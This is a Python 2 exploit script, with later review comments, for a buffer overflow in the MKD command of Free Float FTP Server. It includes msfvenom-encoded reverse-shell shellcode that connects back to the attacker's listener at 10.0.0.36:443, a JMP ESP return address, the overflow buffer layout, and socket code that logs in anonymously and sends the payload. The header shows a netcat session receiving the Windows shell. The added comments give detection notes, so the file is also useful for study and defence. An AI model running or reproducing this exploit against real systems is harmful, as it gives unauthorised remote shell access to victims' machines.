#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Exploit Free Float FTP - 'MKD' Buffer Overflow
#
# How I tested it:
# - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# http://www.exploit-db.com/wp-content/themes/exploit/applications/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip
# - Just run the binary and the service will be running
# - pattern_create.rb and pattern_offset.rb = 247
# - Badchars = \x00\x0a\x0d
# - Return Address found at 0x7ca58265 (JMP ESP) | SHELL32.dll
# - Generated the payload using msfvenom
#
# PoC:
# terminal 1
# root@kali: python exploit-freefloatftp.py
# terminal 2
# root@kali:~# nc -nlvp 443
# listening on [any] 443 ...
# connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\Joe\Meus documentos>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import sys
# Flat script: builds one oversized FTP MKD argument and sends it to the lab target
# named in the header (10.0.0.44:21). There are no functions; the connection is made
# at import time, so merely importing this file performs the network I/O.
#
# Defensive notes (for anyone reading this as a case study rather than running it):
# - Wire signature: anonymous USER/PASS login followed by a single MKD whose argument
#   is ~1000 bytes and mostly "A"/"C" filler — trivial to flag in FTP-aware IDS or
#   server logs.
# - The return address below is a fixed SHELL32.dll address taken from one Windows XP
#   build (see header). Host-level DEP/ASLR, or simply not exposing this unpatched
#   service, defeats the technique as written.
#
# NOTE(review): this is Python 2 code (shebang `/usr/bin/python`, 2017) — the str
# literals handed to socket.send() are byte strings there.

# Saved return address overwrite: little-endian 0x7ca58265, the JMP ESP in SHELL32.dll
# recorded in the header. Valid only for that exact module/build.
eip = "\x65\x82\xa5\x7c"
# Short NOP sled between the return address and the payload.
nops = "\x90"*20
# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
#Payload size: 351 bytes
# Opaque encoded payload emitted by the msfvenom command above; per the header it is a
# reverse shell back to the lab listener (10.0.0.36:443), encoded to avoid the bad
# characters \x00\x0a\x0d. Not inspectable as-is — treat it as a 351-byte blob.
shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\x5a\xbe\x6a\x9f\x74\x89\x29\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x13\x03\x18\x8c\x96\x7c\x20\x5a\xd4"
"\x7f\xd8\x9b\xb9\xf6\x3d\xaa\xf9\x6d\x36\x9d\xc9\xe6\x1a\x12"
"\xa1\xab\x8e\xa1\xc7\x63\xa1\x02\x6d\x52\x8c\x93\xde\xa6\x8f"
"\x17\x1d\xfb\x6f\x29\xee\x0e\x6e\x6e\x13\xe2\x22\x27\x5f\x51"
"\xd2\x4c\x15\x6a\x59\x1e\xbb\xea\xbe\xd7\xba\xdb\x11\x63\xe5"
"\xfb\x90\xa0\x9d\xb5\x8a\xa5\x98\x0c\x21\x1d\x56\x8f\xe3\x6f"
"\x97\x3c\xca\x5f\x6a\x3c\x0b\x67\x95\x4b\x65\x9b\x28\x4c\xb2"
"\xe1\xf6\xd9\x20\x41\x7c\x79\x8c\x73\x51\x1c\x47\x7f\x1e\x6a"
"\x0f\x9c\xa1\xbf\x24\x98\x2a\x3e\xea\x28\x68\x65\x2e\x70\x2a"
"\x04\x77\xdc\x9d\x39\x67\xbf\x42\x9c\xec\x52\x96\xad\xaf\x3a"
"\x5b\x9c\x4f\xbb\xf3\x97\x3c\x89\x5c\x0c\xaa\xa1\x15\x8a\x2d"
"\xc5\x0f\x6a\xa1\x38\xb0\x8b\xe8\xfe\xe4\xdb\x82\xd7\x84\xb7"
"\x52\xd7\x50\x17\x02\x77\x0b\xd8\xf2\x37\xfb\xb0\x18\xb8\x24"
"\xa0\x23\x12\x4d\x4b\xde\xf5\x78\x8c\xe0\x21\x15\x8e\xe0\x28"
"\x5e\x07\x06\x40\xb0\x4e\x91\xfd\x29\xcb\x69\x9f\xb6\xc1\x14"
"\x9f\x3d\xe6\xe9\x6e\xb6\x83\xf9\x07\x36\xde\xa3\x8e\x49\xf4"
"\xcb\x4d\xdb\x93\x0b\x1b\xc0\x0b\x5c\x4c\x36\x42\x08\x60\x61"
"\xfc\x2e\x79\xf7\xc7\xea\xa6\xc4\xc6\xf3\x2b\x70\xed\xe3\xf5"
"\x79\xa9\x57\xaa\x2f\x67\x01\x0c\x86\xc9\xfb\xc6\x75\x80\x6b"
"\x9e\xb5\x13\xed\x9f\x93\xe5\x11\x11\x4a\xb0\x2e\x9e\x1a\x34"
"\x57\xc2\xba\xbb\x82\x46\xca\xf1\x8e\xef\x43\x5c\x5b\xb2\x09"
"\x5f\xb6\xf1\x37\xdc\x32\x8a\xc3\xfc\x37\x8f\x88\xba\xa4\xfd"
"\x81\x2e\xca\x52\xa1\x7a")
# Layout of the MKD argument: 247 bytes of filler up to the saved return address
# (the pattern_offset.rb result from the header), the 4-byte address, the sled, the
# payload, then "C" padding so the whole argument is exactly 1000 bytes.
buffer = "A"*247 + eip + nops + shellcode + "C"*(1000-247-4-20-351)
# Plain TCP to the FTP control port of the hard-coded lab target.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None, so `connect` is never meaningful and is unused below.
connect=s.connect(('10.0.0.44',21))
# Each recv() just drains the server's reply; the responses are never checked, so a
# failed login or a rejected command is not detected by this script.
s.recv(1024)
# Anonymous login — the vulnerable MKD handler is only reachable after authentication.
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
# The oversized MKD argument is the trigger; this single command is the observable
# event a defender can alert on (FTP MKD with a ~1000-byte directory name).
s.send('MKD ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# NOTE(review): missing parentheses — `s.close` only references the bound method and
# never calls it, so the socket is not closed explicitly and is released at exit.
s.close